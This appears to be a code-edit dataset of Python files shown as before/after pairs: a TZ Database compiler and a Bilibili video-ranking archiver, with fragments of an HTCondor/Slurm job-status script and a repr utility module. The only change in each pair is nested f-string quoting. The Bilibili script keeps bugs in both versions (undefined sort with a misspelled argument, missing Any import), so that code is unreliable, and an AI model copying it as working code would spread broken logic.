constraint=f"ClusterId == {id}",
projection=["RemoteHost"]
)
except IndexError:
print(f"No jobs found for ID {id}.")
sys.exit(0)
except:
print(f"Unable to look up job resources")
sys.exit(1)
if len(job) == 0:
print(f"No jobs found for ID {id}.")
sys.exit(0)
# TODO: Make this work correctly for jobs that havne't started running yet
job_host = job[0]["RemoteHost"]
print(f"Job is using resource {job_host}")
# Jobs running on provisioned Slurm resources need to retrieve
# additional information from the provisioning DAGMan log
elif options["resource"] == "slurm":
# Internal variables
dagman_cluster_id = None
provisioner_cluster_id = None
slurm_cluster_id = None
# User-facing variables (all values set below are default/initial state)
provisioner_job_submitted_time = None
provisioner_job_scheduled_end_time = None
job_status = "NOT SUBMITTED"
job_started_time = None
jobs_running = 0
slurm_nodes_requested = None
slurm_runtime = None
dagman_dag, dagman_out, dagman_log = DAGMan.get_files(id)
if dagman_dag is None:
print(f"No Slurm job found for ID {id}.")
sys.exit(0)
# Parse the .dag file to retrieve some user input values
with open(dagman_dag, "r") as dagman_dag_file:
for line in dagman_dag_file.readlines():
if "annex_runtime =" in line:
slurm_runtime = int(line.split("=")[1].strip())
# Parse the DAGMan event log for useful information
dagman_events = htcondor.JobEventLog(dagman_log)
for event in dagman_events.events(0):
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: B":
provisioner_cluster_id = event.cluster
provisioner_job_submitted_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
job_status = "PROVISIONING REQUEST PENDING"
if event.cluster == provisioner_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
provisioner_job_started_time = datetime.fromtimestamp(event.timestamp)
provisioner_job_scheduled_end_time = datetime.fromtimestamp(event.timestamp + slurm_runtime)
if "LogNotes" in event.keys() and event["LogNotes"] == "DAG Node: C":
slurm_cluster_id = event.cluster
job_started_time = datetime.fromtimestamp(event.timestamp)
if event.cluster == slurm_cluster_id and event.type == htcondor.JobEventType.EXECUTE:
job_status = "RUNNING"
jobs_running += 1
if event.cluster == slurm_cluster_id and (event.type == htcondor.JobEventType.JOB_TERMINATED or event.type == htcondor.JobEventType.JOB_EVICTED):
jobs_running -= 1
if jobs_running == 0:
job_status = "COMPLETE"
if event.type == htcondor.JobEventType.JOB_HELD or event.type == htcondor.JobEventType.EXECUTABLE_ERROR:
job_status = "ERROR"
# Now that we have all the information we want, display it
if job_status == "PROVISIONING REQUEST PENDING":
print(f"Job is still waiting for {slurm_nodes_requested} Slurm nodes to provision")
elif job_status == "RUNNING":
print(f"Job is running on {jobs_running}/{slurm_nodes_requested} requested Slurm nodes")
elif job_status == "ERROR":
print(f"An error occurred provisioning Slurm resources")
# Show information about time remaining
if job_status == "RUNNING" or job_status == "COMPLETE":
current_time = datetime.now()
if current_time < provisioner_job_scheduled_end_time:
time_diff = provisioner_job_scheduled_end_time - current_time
print(f"Slurm resources are reserved for another {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
else:
time_diff = current_time - provisioner_job_scheduled_end_time
print(f"Slurm resources were terminated since {round(time_diff.seconds/60)}m{(time_diff.seconds%60)}s")
|
#!/usr/bin/env python3
#
# Copyright 2018 Brian T. Park
#
# MIT License.
"""
Read the raw TZ Database files at the location specified by `--input_dir` and
generate the zonedb files in various formats as determined by the '--action'
flag:
* --action tzdb
JSON file representation of the internal zonedb named 'tzdb.json'.
* --action zonedb
The zone_infos.*, zone_policies.*, and sometimes the zone_registry.* and
zone_strings.*, files in various languages.
* --action zonelist
Write just the raw list of zone names named 'zones.txt'.
The --output_dir flag determines the directory where various files should
be created. If empty, it means the same as $PWD.
If '--action zonedb' is selected, there are 2 language options available
using the --language flag:
* --language arduino
* --language python
The raw TZ Database are parsed by extractor.py and processed
transformer.py. The Transformer class accepts a number of options:
* --scope {basic | extended)
* --start_year {start}
* --until_year {until}
* --granularity {seconds}
* --until_at_granularity {seconds}
* --offset_granularity {seconds}
* --strict
which determine which Rules or Zones are retained during the 'transformation'
process.
If --language arduino is selected, the following flags are used:
* --db_namespace {db_namespace}
Use the given identifier as the C++ namespace of the generated classes.
* --generate_zone_strings
Generate the 'zone_strings.*' files as well.
Examples:
See tzcompiler.sh
"""
import argparse
import logging
import sys
from typing_extensions import Protocol
from tzdb.extractor import Extractor
from tzdb.transformer import Transformer
from tzdb.tzdbcollector import TzDbCollector, TzDb
from zonedb.argenerator import ArduinoGenerator
from zonedb.pygenerator import PythonGenerator
from zonedb.ingenerator import InlineGenerator
from zonedb.zonelistgenerator import ZoneListGenerator
from zonedb.bufestimator import BufSizeEstimator
class Generator(Protocol):
def generate_files(self, name: str) -> None:
...
def generate_zonedb(
invocation: str,
db_namespace: str,
language: str,
output_dir: str,
generate_zone_strings: bool,
tzdb: TzDb,
) -> None:
logging.info('======== Generating zonedb files')
# Generate internal versions of zone_infos and zone_policies
# so that ZoneSpecifier can be created.
logging.info('==== Generating inlined zone_infos and zone_policies')
inline_generator = InlineGenerator(tzdb['zones_map'], tzdb['rules_map'])
(zone_infos, zone_policies) = inline_generator.generate_maps()
logging.info(
'zone_infos=%d; zone_policies=%d',
len(zone_infos), len(zone_policies))
generator: Generator
# Create the Python or Arduino files as requested
if language == 'python':
logging.info('==== Creating Python zonedb files')
generator = PythonGenerator(
invocation=invocation,
tzdb=tzdb,
)
generator.generate_files(output_dir)
elif language == 'arduino':
logging.info('==== Creating Arduino zonedb files')
# Determine zonedb C++ namespace
# TODO: Maybe move this into ArduinoGenerator?
if not db_namespace:
if tzdb['scope'] == 'basic':
db_namespace = 'zonedb'
elif tzdb['scope'] == 'extended':
db_namespace = 'zonedbx'
else:
raise Exception(
f"db_namespace cannot be determined for "
f"scope '{tzdb["scope"]}'"
)
# Generate the buf_size estimates for each zone, between start_year and
# until_year.
logging.info('==== Estimating transition buffer sizes')
logging.info(
'Checking years in [%d, %d)',
tzdb['start_year'], tzdb['until_year'])
estimator = BufSizeEstimator(
zone_infos, zone_policies, tzdb['start_year'], tzdb['until_year'])
(buf_sizes, max_size) = estimator.estimate()
logging.info(
'Num zones=%d; Max buffer size=%d',
len(buf_sizes), max_size,
)
generator = ArduinoGenerator(
invocation=invocation,
db_namespace=db_namespace,
generate_zone_strings=generate_zone_strings,
tzdb=tzdb,
buf_sizes=buf_sizes,
)
generator.generate_files(output_dir)
else:
raise Exception("Unrecognized language '%s'" % language)
def main() -> None:
"""
Main driver for TZ Database compiler which parses the IANA TZ Database files
located at the --input_dir and generates zoneinfo files and validation
datasets for unit tests at --output_dir.
Usage:
tzcompiler.py [flags...]
"""
# Configure command line flags.
parser = argparse.ArgumentParser(description='Generate Zone Info.')
# Extractor flags.
parser.add_argument(
'--input_dir', help='Location of the input directory', required=True)
# Transformer flags.
parser.add_argument(
'--scope',
# basic: 241 of the simpler time zones for BasicZoneSpecifier
# extended: all 348 time zones for ExtendedZoneSpecifier
choices=['basic', 'extended'],
help='Size of the generated database (basic|extended)',
required=True)
parser.add_argument(
'--start_year',
help='Start year of Zone Eras (default: 2000)',
type=int,
default=2000)
parser.add_argument(
'--until_year',
help='Until year of Zone Eras (default: 2038)',
type=int,
default=2038)
parser.add_argument(
'--granularity',
help=(
'Truncate UNTIL, AT, SAVE and RULES fields to '
+ 'this many seconds (default: 60)'
),
type=int)
parser.add_argument(
'--until_at_granularity',
help=(
'Truncate UNTIL and AT fields to this many seconds '
+ '(default: --granularity)'
),
type=int)
parser.add_argument(
'--offset_granularity',
help=(
'Truncate SAVE, RULES (offset) fields to this many seconds'
+ '(default: --granularity)'
),
type=int)
parser.add_argument(
'--strict',
help='Remove zones and rules not aligned at granularity time boundary',
action='store_true',
default=False)
# Data pipeline selectors. Comma-separated list.
# tzdb: generate 'tzdb.json'
# zonedb: generate zonedb ('zone_infos.*', 'zone_poicies.*') files
# zonelist: generate 'zones.txt' containing relavant zone names
parser.add_argument(
'--action',
help='Type of target(s) to generate',
required=True)
# Language selector (for --action zonedb)
parser.add_argument(
'--language',
choices=['arduino', 'python'],
help='Target language (arduino|python)',
)
# For '--language arduino', the following flags are used.
#
# C++ namespace names for '--language arduino'. If not specified, it will
# automatically be set to 'zonedb' or 'zonedbx' depending on the 'scope'.
parser.add_argument(
'--db_namespace',
help='C++ namespace for the zonedb files (default: zonedb or zonedbx)')
# Generated zone_strings.{h,cpp} files.
parser.add_argument(
'--generate_zone_strings',
help='Generate Arduino zone_strings.{h,cpp} files',
action='store_true')
# The tz_version does not affect any data processing. Its value is
# copied into the various generated files and usually placed in the
# comments section to describe the source of the data that generated the
# various files.
parser.add_argument(
'--tz_version',
help='Version string of the TZ files',
required=True,
)
# Target location of the generated files.
parser.add_argument(
'--output_dir',
help='Location of the output directory',
default='',
)
# Parse the command line arguments
args = parser.parse_args()
# Manually parse the comma-separated --action.
actions = set(args.action.split(','))
allowed_actions = set(['tzdb', 'zonedb', 'zonelist'])
if not actions.issubset(allowed_actions):
print(f'Invalid --action: {actions - allowed_actions}')
sys.exit(1)
# Configure logging. This should normally be executed after the
# parser.parse_args() because it allows us set the logging.level using a
# flag.
logging.basicConfig(level=logging.INFO)
# How the script was invoked
invocation = ' '.join(sys.argv)
# Define scope-dependent granularity if not overridden by flag
if args.granularity:
until_at_granularity = args.granularity
offset_granularity = args.granularity
else:
if args.until_at_granularity:
until_at_granularity = args.until_at_granularity
else:
until_at_granularity = 60
if args.offset_granularity:
offset_granularity = args.offset_granularity
else:
if args.scope == 'basic':
offset_granularity = 900
else:
offset_granularity = 60
logging.info('Using UNTIL/AT granularity: %d', until_at_granularity)
logging.info(
'Using RULES/SAVE (offset) granularity: %d',
offset_granularity)
# Extract the TZ files
logging.info('======== Extracting TZ Data files')
extractor = Extractor(args.input_dir)
extractor.parse()
extractor.print_summary()
rules_map, zones_map, links_map = extractor.get_data()
# Transform the TZ zones and rules
logging.info('======== Transforming Zones and Rules')
logging.info('Extracting years [%d, %d)', args.start_year, args.until_year)
transformer = Transformer(
zones_map,
rules_map,
links_map,
args.scope,
args.start_year,
args.until_year,
until_at_granularity,
offset_granularity,
args.strict,
)
transformer.transform()
transformer.print_summary()
(
zones_map, rules_map, links_map, removed_zones, removed_policies,
removed_links, notable_zones, notable_policies, notable_links,
format_strings, zone_strings,
) = transformer.get_data()
# Collect TZ DB data into a single JSON-serializable object.
tzdb_generator = TzDbCollector(
tz_version=args.tz_version,
tz_files=Extractor.ZONE_FILES,
scope=args.scope,
start_year=args.start_year,
until_year=args.until_year,
until_at_granularity=until_at_granularity,
offset_granularity=offset_granularity,
strict=args.strict,
zones_map=zones_map,
links_map=links_map,
rules_map=rules_map,
removed_zones=removed_zones,
removed_links=removed_links,
removed_policies=removed_policies,
notable_zones=notable_zones,
notable_links=notable_links,
notable_policies=notable_policies,
format_strings=format_strings,
zone_strings=zone_strings,
)
tzdb = tzdb_generator.get_data()
for action in actions:
if action == 'zonedb':
generate_zonedb(
invocation=invocation,
db_namespace=args.db_namespace,
language=args.language,
output_dir=args.output_dir,
generate_zone_strings=args.generate_zone_strings,
tzdb=tzdb,
)
elif action == 'tzdb':
logging.info('======== Creating JSON zonedb files')
tzdb_generator.generate_files(args.output_dir)
elif action == 'zonelist':
logging.info('======== Creating zones.txt')
generator = ZoneListGenerator(
invocation=invocation,
tzdb=tzdb,
)
generator.generate_files(args.output_dir)
else:
logging.error(f"Unrecognized action '{action}'")
sys.exit(1)
logging.info('======== Finished processing TZ Data files.')
if __name__ == '__main__':
main()
| #!/usr/bin/env python3
#
# Copyright 2018 Brian T. Park
#
# MIT License.
"""
Read the raw TZ Database files at the location specified by `--input_dir` and
generate the zonedb files in various formats as determined by the '--action'
flag:
* --action tzdb
JSON file representation of the internal zonedb named 'tzdb.json'.
* --action zonedb
The zone_infos.*, zone_policies.*, and sometimes the zone_registry.* and
zone_strings.*, files in various languages.
* --action zonelist
Write just the raw list of zone names named 'zones.txt'.
The --output_dir flag determines the directory where various files should
be created. If empty, it means the same as $PWD.
If '--action zonedb' is selected, there are 2 language options available
using the --language flag:
* --language arduino
* --language python
The raw TZ Database are parsed by extractor.py and processed
transformer.py. The Transformer class accepts a number of options:
* --scope {basic | extended)
* --start_year {start}
* --until_year {until}
* --granularity {seconds}
* --until_at_granularity {seconds}
* --offset_granularity {seconds}
* --strict
which determine which Rules or Zones are retained during the 'transformation'
process.
If --language arduino is selected, the following flags are used:
* --db_namespace {db_namespace}
Use the given identifier as the C++ namespace of the generated classes.
* --generate_zone_strings
Generate the 'zone_strings.*' files as well.
Examples:
See tzcompiler.sh
"""
import argparse
import logging
import sys
from typing_extensions import Protocol
from tzdb.extractor import Extractor
from tzdb.transformer import Transformer
from tzdb.tzdbcollector import TzDbCollector, TzDb
from zonedb.argenerator import ArduinoGenerator
from zonedb.pygenerator import PythonGenerator
from zonedb.ingenerator import InlineGenerator
from zonedb.zonelistgenerator import ZoneListGenerator
from zonedb.bufestimator import BufSizeEstimator
class Generator(Protocol):
def generate_files(self, name: str) -> None:
...
def generate_zonedb(
invocation: str,
db_namespace: str,
language: str,
output_dir: str,
generate_zone_strings: bool,
tzdb: TzDb,
) -> None:
logging.info('======== Generating zonedb files')
# Generate internal versions of zone_infos and zone_policies
# so that ZoneSpecifier can be created.
logging.info('==== Generating inlined zone_infos and zone_policies')
inline_generator = InlineGenerator(tzdb['zones_map'], tzdb['rules_map'])
(zone_infos, zone_policies) = inline_generator.generate_maps()
logging.info(
'zone_infos=%d; zone_policies=%d',
len(zone_infos), len(zone_policies))
generator: Generator
# Create the Python or Arduino files as requested
if language == 'python':
logging.info('==== Creating Python zonedb files')
generator = PythonGenerator(
invocation=invocation,
tzdb=tzdb,
)
generator.generate_files(output_dir)
elif language == 'arduino':
logging.info('==== Creating Arduino zonedb files')
# Determine zonedb C++ namespace
# TODO: Maybe move this into ArduinoGenerator?
if not db_namespace:
if tzdb['scope'] == 'basic':
db_namespace = 'zonedb'
elif tzdb['scope'] == 'extended':
db_namespace = 'zonedbx'
else:
raise Exception(
f"db_namespace cannot be determined for "
f"scope '{tzdb['scope']}'"
)
# Generate the buf_size estimates for each zone, between start_year and
# until_year.
logging.info('==== Estimating transition buffer sizes')
logging.info(
'Checking years in [%d, %d)',
tzdb['start_year'], tzdb['until_year'])
estimator = BufSizeEstimator(
zone_infos, zone_policies, tzdb['start_year'], tzdb['until_year'])
(buf_sizes, max_size) = estimator.estimate()
logging.info(
'Num zones=%d; Max buffer size=%d',
len(buf_sizes), max_size,
)
generator = ArduinoGenerator(
invocation=invocation,
db_namespace=db_namespace,
generate_zone_strings=generate_zone_strings,
tzdb=tzdb,
buf_sizes=buf_sizes,
)
generator.generate_files(output_dir)
else:
raise Exception("Unrecognized language '%s'" % language)
def main() -> None:
"""
Main driver for TZ Database compiler which parses the IANA TZ Database files
located at the --input_dir and generates zoneinfo files and validation
datasets for unit tests at --output_dir.
Usage:
tzcompiler.py [flags...]
"""
# Configure command line flags.
parser = argparse.ArgumentParser(description='Generate Zone Info.')
# Extractor flags.
parser.add_argument(
'--input_dir', help='Location of the input directory', required=True)
# Transformer flags.
parser.add_argument(
'--scope',
# basic: 241 of the simpler time zones for BasicZoneSpecifier
# extended: all 348 time zones for ExtendedZoneSpecifier
choices=['basic', 'extended'],
help='Size of the generated database (basic|extended)',
required=True)
parser.add_argument(
'--start_year',
help='Start year of Zone Eras (default: 2000)',
type=int,
default=2000)
parser.add_argument(
'--until_year',
help='Until year of Zone Eras (default: 2038)',
type=int,
default=2038)
parser.add_argument(
'--granularity',
help=(
'Truncate UNTIL, AT, SAVE and RULES fields to '
+ 'this many seconds (default: 60)'
),
type=int)
parser.add_argument(
'--until_at_granularity',
help=(
'Truncate UNTIL and AT fields to this many seconds '
+ '(default: --granularity)'
),
type=int)
parser.add_argument(
'--offset_granularity',
help=(
'Truncate SAVE, RULES (offset) fields to this many seconds'
+ '(default: --granularity)'
),
type=int)
parser.add_argument(
'--strict',
help='Remove zones and rules not aligned at granularity time boundary',
action='store_true',
default=False)
# Data pipeline selectors. Comma-separated list.
# tzdb: generate 'tzdb.json'
# zonedb: generate zonedb ('zone_infos.*', 'zone_poicies.*') files
# zonelist: generate 'zones.txt' containing relavant zone names
parser.add_argument(
'--action',
help='Type of target(s) to generate',
required=True)
# Language selector (for --action zonedb)
parser.add_argument(
'--language',
choices=['arduino', 'python'],
help='Target language (arduino|python)',
)
# For '--language arduino', the following flags are used.
#
# C++ namespace names for '--language arduino'. If not specified, it will
# automatically be set to 'zonedb' or 'zonedbx' depending on the 'scope'.
parser.add_argument(
'--db_namespace',
help='C++ namespace for the zonedb files (default: zonedb or zonedbx)')
# Generated zone_strings.{h,cpp} files.
parser.add_argument(
'--generate_zone_strings',
help='Generate Arduino zone_strings.{h,cpp} files',
action='store_true')
# The tz_version does not affect any data processing. Its value is
# copied into the various generated files and usually placed in the
# comments section to describe the source of the data that generated the
# various files.
parser.add_argument(
'--tz_version',
help='Version string of the TZ files',
required=True,
)
# Target location of the generated files.
parser.add_argument(
'--output_dir',
help='Location of the output directory',
default='',
)
# Parse the command line arguments
args = parser.parse_args()
# Manually parse the comma-separated --action.
actions = set(args.action.split(','))
allowed_actions = set(['tzdb', 'zonedb', 'zonelist'])
if not actions.issubset(allowed_actions):
print(f'Invalid --action: {actions - allowed_actions}')
sys.exit(1)
# Configure logging. This should normally be executed after the
# parser.parse_args() because it allows us set the logging.level using a
# flag.
logging.basicConfig(level=logging.INFO)
# How the script was invoked
invocation = ' '.join(sys.argv)
# Define scope-dependent granularity if not overridden by flag
if args.granularity:
until_at_granularity = args.granularity
offset_granularity = args.granularity
else:
if args.until_at_granularity:
until_at_granularity = args.until_at_granularity
else:
until_at_granularity = 60
if args.offset_granularity:
offset_granularity = args.offset_granularity
else:
if args.scope == 'basic':
offset_granularity = 900
else:
offset_granularity = 60
logging.info('Using UNTIL/AT granularity: %d', until_at_granularity)
logging.info(
'Using RULES/SAVE (offset) granularity: %d',
offset_granularity)
# Extract the TZ files
logging.info('======== Extracting TZ Data files')
extractor = Extractor(args.input_dir)
extractor.parse()
extractor.print_summary()
rules_map, zones_map, links_map = extractor.get_data()
# Transform the TZ zones and rules
logging.info('======== Transforming Zones and Rules')
logging.info('Extracting years [%d, %d)', args.start_year, args.until_year)
transformer = Transformer(
zones_map,
rules_map,
links_map,
args.scope,
args.start_year,
args.until_year,
until_at_granularity,
offset_granularity,
args.strict,
)
transformer.transform()
transformer.print_summary()
(
zones_map, rules_map, links_map, removed_zones, removed_policies,
removed_links, notable_zones, notable_policies, notable_links,
format_strings, zone_strings,
) = transformer.get_data()
# Collect TZ DB data into a single JSON-serializable object.
tzdb_generator = TzDbCollector(
tz_version=args.tz_version,
tz_files=Extractor.ZONE_FILES,
scope=args.scope,
start_year=args.start_year,
until_year=args.until_year,
until_at_granularity=until_at_granularity,
offset_granularity=offset_granularity,
strict=args.strict,
zones_map=zones_map,
links_map=links_map,
rules_map=rules_map,
removed_zones=removed_zones,
removed_links=removed_links,
removed_policies=removed_policies,
notable_zones=notable_zones,
notable_links=notable_links,
notable_policies=notable_policies,
format_strings=format_strings,
zone_strings=zone_strings,
)
tzdb = tzdb_generator.get_data()
for action in actions:
if action == 'zonedb':
generate_zonedb(
invocation=invocation,
db_namespace=args.db_namespace,
language=args.language,
output_dir=args.output_dir,
generate_zone_strings=args.generate_zone_strings,
tzdb=tzdb,
)
elif action == 'tzdb':
logging.info('======== Creating JSON zonedb files')
tzdb_generator.generate_files(args.output_dir)
elif action == 'zonelist':
logging.info('======== Creating zones.txt')
generator = ZoneListGenerator(
invocation=invocation,
tzdb=tzdb,
)
generator.generate_files(args.output_dir)
else:
logging.error(f"Unrecognized action '{action}'")
sys.exit(1)
logging.info('======== Finished processing TZ Data files.')
if __name__ == '__main__':
main()
|
from typing import List
import json
from time import sleep
from datetime import date
from os import path
from api import BilibiliApi
from writer import write_md, write_raw_data
BASE_PATH = './archive'
NAP_TIME = .5
def generate_md(raw_data: BilibiliApi.RAW_DATA_T) -> str:
res = []
for video in raw_data:
line = '1. '
url = f'https://www.bilibili.com/video/{video['bvid']}'
line += f'[{video['title']}]({url})'
res.append(line)
return '\n'.join(res)
def generate_md_table_row(row: List[Any]) -> str:
return f'| {' | '.join(r for r in row)} |\n'
def summarize_tags(api: BilibiliApi, loc: str, name: str, aids: List[str]) -> BilibiliApi.RAW_DATA_T:
all_tags = {}
for aid in aids:
sleep(NAP_TIME)
tag_list = api.get_tag(aid)
for tag in tag_list:
if tag['tag_id'] in all_tags:
all_tags[tag['tag_id']]['day_count'] += 1
else:
all_tags[tag['tag_id']] = {'data': tag, 'day_count': 1}
write_raw_data(all_tags, path.join(loc, 'Tags', 'README.md'))
summary = []
for _, tag in all_tags.items():
name = tag['data']['tag_name']
count = tag['day_count']
summary.append((name, count))
sort(summary, key=lambda x: x[1], acending=False)
summary_header = ['Tag', 'Count']
summary_md = '# Tag Distribution\n'
summary_md += generate_md_table_row(summary_header)
summary_md += generate_md_table_row(['---'] * len(summary_header))
for row in summary:
summary_md += generate_md_table_row(row)
write_md(summary_md, path.join(loc, 'Tags', name))
def summarize_highest_ranked(api: BilibiliApi, loc: str) -> BilibiliApi.RAW_DATA_T:
highest_ranked = api.get_highest_ranked()
write_raw_data(highest_ranked, path.join(loc, 'Raw', 'highest_ranked.json'))
aids = [video['aid'] for video in highest_ranked]
summarize_tags(api, loc, 'highest_ranked.json', aids)
return highest_ranked
def summarize_most_popular(api: BilibiliApi, loc: str) -> BilibiliApi.RAW_DATA_T:
most_popular = api.get_most_popular()
write_raw_data(most_popular, path.join(loc, 'Raw', 'most_popular.json'))
aids = (video['aid'] for video in most_popular)
summarize_tags(api, loc, 'most_popular.json', aids)
return most_popular
def summarize_today():
date_str = date.today().isoformat()
loc = path.join(BASE_PATH, 'Bilibili', date_str)
api = BilibiliApi()
highest_ranked = summarize_highest_ranked(api, loc)
most_popular = summarize_most_popular(api, loc)
md_str = '# Highest Ranked Videos\n'
md_str += generate_md(highest_ranked)
md_str += '\n\n'
md_str += '# Most Popular Videos\n'
md_str += generate_md(most_popular)
write_md(md_str, path.join(loc, 'README.md'))
if __name__ == '__main__':
summarize_today()
| from typing import List
import json
from time import sleep
from datetime import date
from os import path
from api import BilibiliApi
from writer import write_md, write_raw_data
BASE_PATH = './archive'
NAP_TIME = .5
def generate_md(raw_data: BilibiliApi.RAW_DATA_T) -> str:
res = []
for video in raw_data:
line = '1. '
url = f'https://www.bilibili.com/video/{video["bvid"]}'
line += f'[{video["title"]}]({url})'
res.append(line)
return '\n'.join(res)
def generate_md_table_row(row: List[Any]) -> str:
return f'| {" | ".join(r for r in row)} |\n'
def summarize_tags(api: BilibiliApi, loc: str, name: str, aids: List[str]) -> BilibiliApi.RAW_DATA_T:
all_tags = {}
for aid in aids:
sleep(NAP_TIME)
tag_list = api.get_tag(aid)
for tag in tag_list:
if tag['tag_id'] in all_tags:
all_tags[tag['tag_id']]['day_count'] += 1
else:
all_tags[tag['tag_id']] = {'data': tag, 'day_count': 1}
write_raw_data(all_tags, path.join(loc, 'Tags', 'README.md'))
summary = []
for _, tag in all_tags.items():
name = tag['data']['tag_name']
count = tag['day_count']
summary.append((name, count))
sort(summary, key=lambda x: x[1], acending=False)
summary_header = ['Tag', 'Count']
summary_md = '# Tag Distribution\n'
summary_md += generate_md_table_row(summary_header)
summary_md += generate_md_table_row(['---'] * len(summary_header))
for row in summary:
summary_md += generate_md_table_row(row)
write_md(summary_md, path.join(loc, 'Tags', name))
def summarize_highest_ranked(api: BilibiliApi, loc: str) -> BilibiliApi.RAW_DATA_T:
highest_ranked = api.get_highest_ranked()
write_raw_data(highest_ranked, path.join(loc, 'Raw', 'highest_ranked.json'))
aids = [video['aid'] for video in highest_ranked]
summarize_tags(api, loc, 'highest_ranked.json', aids)
return highest_ranked
def summarize_most_popular(api: BilibiliApi, loc: str) -> BilibiliApi.RAW_DATA_T:
most_popular = api.get_most_popular()
write_raw_data(most_popular, path.join(loc, 'Raw', 'most_popular.json'))
aids = (video['aid'] for video in most_popular)
summarize_tags(api, loc, 'most_popular.json', aids)
return most_popular
def summarize_today():
date_str = date.today().isoformat()
loc = path.join(BASE_PATH, 'Bilibili', date_str)
api = BilibiliApi()
highest_ranked = summarize_highest_ranked(api, loc)
most_popular = summarize_most_popular(api, loc)
md_str = '# Highest Ranked Videos\n'
md_str += generate_md(highest_ranked)
md_str += '\n\n'
md_str += '# Most Popular Videos\n'
md_str += generate_md(most_popular)
write_md(md_str, path.join(loc, 'README.md'))
if __name__ == '__main__':
summarize_today()
|
# Copyright 2016 - 2022 Alexey Stepanov aka penguinolog
# Copyright 2016 Mirantis, Inc.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""repr_utils module.
This is no reason to import this submodule directly, all required methods is
available from the main module.
"""
from __future__ import annotations
# Standard Library
import abc
import collections
import inspect
import types
import typing
if typing.TYPE_CHECKING:
# Standard Library
import dataclasses
from collections.abc import Callable
from collections.abc import Iterable
__all__ = ("PrettyFormat", "PrettyRepr", "PrettyStr", "pretty_repr", "pretty_str")
_SIMPLE_MAGIC_ATTRIBUTES = ("__repr__", "__str__")
@typing.runtime_checkable
class _AttributeHolderProto(typing.Protocol):
__slots__ = ()
def _get_kwargs(self) -> list[tuple[str, typing.Any]]:
"""Protocol stub."""
def _get_args(self) -> list[str]:
"""Protocol stub."""
@typing.runtime_checkable
class _NamedTupleProto(typing.Protocol):
__slots__ = ()
def _asdict(self) -> dict[str, typing.Any]:
"""Protocol stub."""
def __getnewargs__(self) -> tuple[typing.Any, ...]:
"""Protocol stub."""
def _replace(self, /, **kwds: dict[str, typing.Any]) -> _NamedTupleProto:
"""Protocol stub."""
@classmethod
def _make(cls, iterable: Iterable[typing.Any]) -> _NamedTupleProto:
"""Protocol stub."""
@typing.runtime_checkable
class _DataClassProto(typing.Protocol):
__slots__ = ()
__dataclass_params__: dataclasses._DataclassParams # type: ignore[name-defined]
__dataclass_fields__: dict[str, dataclasses.Field[typing.Any]] = {}
def _known_callable(item: typing.Any) -> bool:
"""Check for possibility to parse callable.
:param item: item to check for repr() way
:type item: typing.Any
:return: item is callable and should be processed not using repr
:rtype: bool
"""
return isinstance(item, (types.FunctionType, types.MethodType))
def _simple(item: typing.Any) -> bool:
"""Check for nested iterations: True, if not.
:param item: item to check for repr() way
:type item: typing.Any
:return: use repr() iver item by default
:rtype: bool
"""
return not any(
(
isinstance(item, data_type)
and all(
getattr(type(item), attribute) is getattr(data_type, attribute)
for attribute in _SIMPLE_MAGIC_ATTRIBUTES
)
)
for data_type in (list, set, tuple, dict, frozenset, collections.deque)
)
class ReprParameter:
"""Parameter wrapper wor repr and str operations over signature."""
__slots__ = ("_value", "_parameter")
POSITIONAL_ONLY = inspect.Parameter.POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = inspect.Parameter.POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = inspect.Parameter.VAR_POSITIONAL
KEYWORD_ONLY = inspect.Parameter.KEYWORD_ONLY
VAR_KEYWORD = inspect.Parameter.VAR_KEYWORD
empty = inspect.Parameter.empty
def __init__(self, parameter: inspect.Parameter, value: typing.Any = inspect.Parameter.empty) -> None:
"""Parameter-like object store for repr and str tasks.
:param parameter: parameter from signature
:type parameter: inspect.Parameter
:param value: default value override
:type value: typing.Any
"""
self._parameter: inspect.Parameter = parameter
self._value: typing.Any = value if value is not parameter.empty else parameter.default
@property
def parameter(self) -> inspect.Parameter:
"""Parameter object.
:return: original inspect.Parameter object
:rtype: inspect.Parameter
"""
return self._parameter
@property
def name(self) -> None | str:
"""Parameter name.
:return: parameter name. For `*args` and `**kwargs` add corresponding prefixes
:rtype: None | str
"""
if self.kind == inspect.Parameter.VAR_POSITIONAL:
return "*" + self.parameter.name
if self.kind == inspect.Parameter.VAR_KEYWORD:
return "**" + self.parameter.name
return self.parameter.name
@property
def value(self) -> typing.Any:
"""Parameter value to log.
:return: If function is bound to class -> value is class instance else default value.
:rtype: typing.Any
"""
return self._value
@property
def annotation(self) -> inspect.Parameter.empty | str: # type: ignore[valid-type]
"""Parameter annotation.
:return: parameter annotation from signature
:rtype: inspect.Parameter.empty | str
"""
return self.parameter.annotation # type: ignore[no-any-return]
@property
def kind(self) -> int:
"""Parameter kind.
:return: parameter kind from inspect.Parameter
:rtype: int
"""
# noinspection PyTypeChecker
return self.parameter.kind
def __hash__(self) -> typing.NoReturn: # pylint: disable=invalid-hash-returned
"""Block hashing.
:raises TypeError: Not hashable.
"""
msg = f"not hashable type: '{self.__class__.__name__}'"
raise TypeError(msg)
def __repr__(self) -> str:
"""Debug purposes.
:return: parameter repr for debug purposes
:rtype: str
"""
return f'<{self.__class__.__name__} "{self}">'
def _prepare_repr(func: types.FunctionType | types.MethodType) -> list[ReprParameter]:
"""Get arguments lists with defaults.
:param func: Callable object to process
:type func: types.FunctionType | types.MethodType
:return: repr of callable parameter from signature
:rtype: list[ReprParameter]
"""
ismethod: bool = isinstance(func, types.MethodType)
self_processed: bool = False
result: list[ReprParameter] = []
if not ismethod:
real_func: Callable[..., typing.Any] = func
else:
real_func = func.__func__ # type: ignore[union-attr]
for param in inspect.signature(real_func).parameters.values():
if not self_processed and ismethod and func.__self__ is not None: # type: ignore[union-attr]
result.append(ReprParameter(param, value=func.__self__)) # type: ignore[union-attr]
self_processed = True
else:
result.append(ReprParameter(param))
return result
class PrettyFormat(metaclass=abc.ABCMeta):
